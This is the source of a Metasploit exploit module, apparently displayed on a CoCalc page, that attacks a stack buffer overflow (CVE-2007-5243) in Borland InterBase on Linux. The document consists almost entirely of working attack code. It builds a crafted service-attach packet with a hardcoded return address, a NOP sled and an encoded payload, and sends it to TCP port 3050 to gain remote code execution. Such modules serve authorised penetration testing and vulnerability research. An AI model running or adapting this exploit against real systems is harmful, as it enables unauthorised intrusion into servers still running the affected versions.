CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'		=> 'Borland InterBase INET_connect() Buffer Overflow',
14
      'Description'	=> %q{
15
        This module exploits a stack buffer overflow in Borland InterBase
16
        by sending a specially crafted service attach request.
17
      },
18
      'Author'	=>
19
        [
20
          'Ramon de C Valle',
21
          'Adriano Lima <adriano[at]risesecurity.org>',
22
        ],
23
      'Arch'		=> ARCH_X86,
24
      'Platform'	=> 'linux',
25
      'References'	=>
26
        [
27
          [ 'CVE', '2007-5243' ],
28
          [ 'OSVDB', '38605' ],
29
          [ 'BID', '25917' ],
30
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
31
        ],
32
      'Privileged'	=> true,
33
      'License'	=> MSF_LICENSE,
34
      'Payload'	=>
35
        {
36
          'Space' => 512,
37
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
38
        },
39
      'Targets'	=>
40
        [
41
          # 0x0804d2ee 5b5e5f5dc3
42
          [
43
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
44
            { 'Ret' => 0x0804d2ee }
45
          ],
46
        ],
47
      'DefaultTarget'	=> 0,
48
      'DisclosureDate'  => '2007-10-03'
49
    ))
50

51
    register_options(
52
      [
53
        Opt::RPORT(3050)
54
      ],
55
      self.class
56
    )
57

58
  end
59

60
  def exploit
61

62
    connect
63

64
    # Attach database
65
    op_attach = 19
66

67
    # Create database
68
    op_create = 20
69

70
    # Service attach
71
    op_service_attach = 82
72

73
    length = 161
74
    remainder = length.remainder(4)
75
    padding = 0
76

77
    if remainder > 0
78
      padding = (4 - remainder)
79
    end
80

81
    buf = ''
82

83
    # Operation/packet type
84
    buf << [op_service_attach].pack('N')
85

86
    # Id
87
    buf << [0].pack('N')
88

89
    # Length
90
    buf << [length].pack('N')
91

92
    # Random alpha data
93
    buf << rand_text_alpha(length - 5)
94

95
    # Target
96
    buf << [target.ret].pack('L')
97

98
    # Separator
99
    buf << ':'
100

101
    # Padding
102
    buf << "\x00" * padding
103

104
    # Database parameter block
105

106
    # Length
107
    buf << [1024].pack('N')
108

109
    # It will return into this nop block
110
    buf << make_nops(1024 - payload.encoded.length)
111

112
    # Payload
113
    buf << payload.encoded
114

115
    sock.put(buf)
116

117
    handler
118

119
  end
120
end
121

122